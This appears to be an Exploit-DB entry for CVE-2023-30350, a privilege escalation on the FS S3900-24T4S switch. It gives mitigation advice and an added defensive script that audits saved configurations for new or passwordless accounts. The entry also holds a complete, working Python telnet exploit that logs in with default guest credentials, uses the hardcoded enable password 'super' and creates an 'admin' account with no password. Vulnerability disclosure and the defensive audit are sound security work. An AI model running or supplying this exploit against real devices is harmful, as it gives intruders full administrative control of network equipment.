Vendor: S3900-24T4S
By: Daniele Linguaglossa & Alberto Bruscino
CVSS: 7.4 (HIGH)
Privilege Escalation
CWE: 269
Product Name: S3900-24T4S
Affected Version From: latest
Affected Version To: latest
Patch Exists: NO
Related CVE: CVE-2023-30350
CPE: h:fs:s3900-24t4s
Platforms Tested: latest
2023

FS-S3900-24T4S Privilege Escalation

This exploit allows an attacker to gain access to the FS-S3900-24T4S device over the telnet protocol. The attacker logs in with the guest credentials and then uses the enable command with the super password to reach privileged mode. From there, the attacker can enter configuration mode and create a new user with admin privileges and no password.

Mitigation:

Disable telnet access and use SSH instead. Use strong passwords for all accounts. Monitor the device for any suspicious activity.
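
As an added example (not part of the original entry or the exploit authors' code), the monitoring step can be automated by comparing a saved configuration against a known-good baseline and flagging accounts that are new, changed or passwordless. The configuration snippets are constructed, and it is an assumption that the device stores accounts in the same "username <name> nopassword" form as the command typed in the script on this page.

```python
import re

# Matches account lines in the form typed in the script on this page
# ("username admin nopassword"). Assumption: saved configs use the same form.
USER_RE = re.compile(r"^\s*username\s+(\S+)(?:\s+(.*))?$", re.IGNORECASE)

# Constructed sample configs (not captured from a real device).
BASELINE = """\
hostname lab-switch
username netops password EXAMPLE-SECRET-1
username guest password EXAMPLE-SECRET-2
"""
CURRENT = BASELINE + "username admin nopassword\n"


def parse_accounts(config_text):
    """Map username -> lower-cased option tokens found on its config line."""
    accounts = {}
    for line in config_text.splitlines():
        m = USER_RE.match(line)
        if m:
            accounts[m.group(1)] = (m.group(2) or "").lower().split()
    return accounts


def audit(baseline_text, current_text):
    """Return sorted (user, finding) pairs for accounts that need review."""
    before = parse_accounts(baseline_text)
    now = parse_accounts(current_text)
    findings = []
    for user, opts in now.items():
        if "nopassword" in opts:
            findings.append((user, "no password set"))
        if user not in before:
            findings.append((user, "not in baseline"))
        elif opts != before[user]:
            findings.append((user, "changed since baseline"))
    return sorted(findings)


if __name__ == "__main__":
    for user, finding in audit(BASELINE, CURRENT):
        print(f"{user}: {finding}")
```

Run it against each scheduled configuration backup; any finding on an account that change control did not create is a reason to review the device.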

Exploit-DB raw data:

# Exploit Title: FS-S3900-24T4S Privilege Escalation
# Date: 29/04/2023
# Exploit Author: Daniele Linguaglossa & Alberto Bruscino
# Vendor Homepage: https://www.fs.com/
# Software Link: not available
# Version: latest
# Tested on: latest
# CVE : CVE-2023-30350

import sys
import telnetlib


def exploit(args):
    print(args)
    if len(args) != 1:
        print(f"Usage: {sys.argv[0]} <ip>")
        sys.exit(1)
    else:
        ip = args[0]
        try:
            with telnetlib.Telnet(ip, 23) as tn:
                try:
                    tn.read_until(b"Username: ")
                    tn.write(b"guest\r\n")
                    tn.read_until(b"Password: ")
                    tn.write(b"guest\r\n")
                    tn.read_until(b">")
                    tn.write(b"enable\r\n")
                    tn.read_until(b"Password: ")
                    tn.write(b"super\r\n")
                    tn.read_until(b"#")
                    tn.write(b"configure terminal\r\n")
                    tn.read_until(b"(config)#")
                    tn.write(b"username admin nopassword\r\n")
                    tn.read_until(b"(config)#")
                    print(
                        "Exploit success, you can now login with username: admin and password: <empty>")
                    tn.close()
                except KeyboardInterrupt:
                    print("Exploit failed")
                    tn.close()
        except ConnectionRefusedError:
            print("Connection refused")


if __name__ == "__main__":
    exploit(sys.argv[1:])